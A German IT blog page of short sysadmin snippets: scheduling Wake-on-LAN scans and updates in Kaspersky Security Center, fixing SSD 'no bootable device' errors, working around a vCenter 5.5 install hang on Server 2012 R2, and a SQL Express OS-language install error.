Wake-on-LAN Aufgabe erstellenZu Beginn erstellt man eine neue Aufgabe im Kaspersky Security Center. Was genau diese Aufgabe dann erledigen soll, kann im Verlauf des Assistenten angeben werden (Update, Virusscan, Rollback…). Idealerweise wählt man etwas, das auch durchgeführt werden soll – in diesem Beispiel ein einfacher Virusscan.

 

Wake on LAN im Kaspersky Security Center aktivieren

Wake-On-LAN KasperskySobald die Aufgabe erstellt ist, müssen die Feineinstellungen vorgenommen werden. Zu diesen gelangt man durch Rechtsklick auf die entsprechende Aufgabe und auswählen der Option “Eigenschaften“.  Unter dem Menüpunkt “Zeitplan” befindet sich der gut versteckte Punkt “Erweitert“.

 

 

Wake-On-LAN Kaspersky aktivierenHier das Häkchen bei “Computer vor dem Aufgabenstart per Wake on LAN aktivieren” setzten. Je nach System sollte die Verzögerung angepasst werden. 5 Minuten sollten aber in den meisten Fällen ausreichen.

 

Der grösste Teil der Konfiguration ist damit bereits erledigt. Das Security Center sendet um 00.00 Uhr ein WOL – Signal an die betreffenden Computer, wartet 5 Minuten bis diese hochgefahren sind und beginnt dann mit dem Virusscan.

Weitere Aufgaben anfügen

Nun können weitere Aufgaben hinzugefügt werden – das Vorgehen bleibt dabei  immer gleich. Um also z.B. aktuelle Updates zu installieren einfach eine Aufgabe “Windows-Updates installieren” erstellen. Idealerweise wählt man parallel dazu den Windows eigenen Updatezeitpunkt ebenfalls im gleichen Zeitrahmen (in diesem Fall 00.00 Uhr). Doppelt hält besser ;)

Security Center Aufgabe anhaengenJede nachfolgende Aufgabe sollte Bezug auf die vorhergehende nehmen – daher beim Zeitplan immer “Nach Beenden einer anderen Aufgabe” die vorhergehende Aufgabe angeben. Bei der letzten Aufgabe kann dann unter “Erweitert” das Häkchen “Computer nach Beendigung der Aufgabe herunterfahren” gesetzt werden.

 

 

Ergänzende Überlegungen

Das System funktioniert sehr gut im Zusammenhang mit WSUS. Interessant ist aber auch die Aufgabe “Programm starten” des Security Centers. Dadurch können Updates von Drittanbietern, Skripts oder Batchfiles zeitgesteuert per WOL ausgeführt werden.

Ein kritischer Faktor ist hingegen die Zeit; Scans und Updates dauern nicht immer gleich lange und sollten deshalb grosszügig kalkuliert werden.

Schlussendlich verfügt man mit dem Kaspersky Security Center aber über eine ressourcenschonende und stark individualisierbaren Lösung – perfekt für KMU’s.

“no bootable device”

- - Snippets

Wenn beim Aufstarten die Meldung “no bootable device” oder “No boot device found” erscheint, gibt es viele Gründe für die Ursache. Sobald aber jedoch eine SSD im Spiel ist meist nur einen.

Immer häufiger werden Computer mit einer SSD (Solid State Drive) ausgerüstet. Die Vorteile liegen auf der Hand – eine wesentlich kürzere Zugriffszeit (“schneller”) sowie eine kleinere Anfälligkeit bezüglich externen Krafteinwirkungen (“fallen lassen ;)”). Hingegen sind sie für elektronische Probleme etwas anfälliger  als herkömmliche Festplatten.

No bootable DeviceDer Fehler “no bootable device” tritt meist auf wenn:

  • SSD = Systemlaufwerk
  • “Hard Reboot”, “Cold Restart”  durchgeführt

Die Ursache dafür liegt im Aufbau einer SSD bzw. bei den sogenannten Mapping Tables. Wer detaillierte Informationen dazu sucht sollte einen Blick auf  “The Unknown Risk of SSD Mapping Tables” werfen. Hier nur die Kurzfassung.

Mapping Tables werden von der SSD dazu genutzt, festzustellen wo welche Daten liegen. Wird dieser Prozess unterbrochen (z.B. durch Stromausfall, “Hard  Reboot”) müssen die Mapping Tables neu erstellt werden. Ein “Datenverlust” an sich findet dabei eigentlich nicht statt – das System weiss einfach  nicht mehr wo diese liegen.

Lösung

Die Lösung für die das Problem “no bootable device” ist einfach, braucht aber je nach System etwas Geduld. Einfach den Computer einschalten – und warten. Die fehlenden / beschädigten Mapping Tables werden automatisch neu erstellt. Das Prozedere dauert zwischen 3 – 30 Minuten…

VMware vCenter Server 5.5: Installation der Verzeichnisdienste “hängt”

- - Snippets

Das Grundproblem ist schnell erklärt. Bei der Installation von VMWare vCenter Server 5.5 in einer Server 2012 R2 Installation “hängt” die Installation der Verzeichnisdienste.

Verzeichnisdienste werden installiert

“Verzeichnisdienste werden installiert…” Die Installation hängt

Die Ursache des Problems ist (wieder?) einmal beim “neuen” Server 2012 R2 System zu suchen. Anscheinend benötigt die Installation das File ocsetup.exe,  das beim R2 fehlt. Die Installation bleibt deswegen hängen und kann nicht fortgesetzt werden.

 

 

 

Lösung

Active Directory Lightweight Directory Services installieren

“Active Directory Lightweight Directory Services” mittels Rollenverwaltung installieren

Als Workaround  kann die ocsetup.exe von einem Server 2012 / 2008 System kopiert und auf dem betreffenden R2 System wieder einsetzt werden. Der entsprechende Pfad dazu lautet %windir%\system32\.

(Wer keine Lust auf Copy & Paste hat – hier der direkte Download der ocsetup.exe)

Anschliessend sollten noch die  “Active Directory Lightweight Directory Services” mittels Rollenverwaltung installiert werden. Die Konfiguration derselben ist nicht erforderlich und kann abgebrochen werden.

Schlussendlich sollte dann eine Installation von vCenter Server 5.5 auch unter Server 2012 R2 problemlos verlaufen

SQL Server does not support the language of the OS

- - Snippets

Wenn man SQL Express 2012 oder die entsprechenden Vorgängen installieren möchte, und die Meldung “This SQL Server setup media does not support the language of the OS…” ist die Lösung bereits im Error enthalten. Die Sprache passt nicht – oder doch?

SQL Server not support anguageWichtig ist vor allem, dass man die zum System passende SQL Express Version installiert, d.h. Deutsche Sprache = Deutsche Installationsdatei, Englische Sprache = Englische Installationsdatei. Doch was wenn die Meldung immer noch erscheint – wie in diesem Fall hier?

 

Die Lösung ist zum Glück recht einfach. Es braucht weder das Ändern eines Registryeintrages noch das manuelle Anpassen des Installationsfiles (was einige anscheinend versuchen…) sondern lediglich einen temporären Workaround.

 

Workaround

SQL Server not support language solution

In den Systemeinstellungen die Standardsprache Deutsch (Schweiz) auf Deutsch (Deutschland) setzten, SQL Express ohne Fehler installieren und die Sprache dann wieder zurückstellen. So sollten keine weiteren Komplikationen auftreten.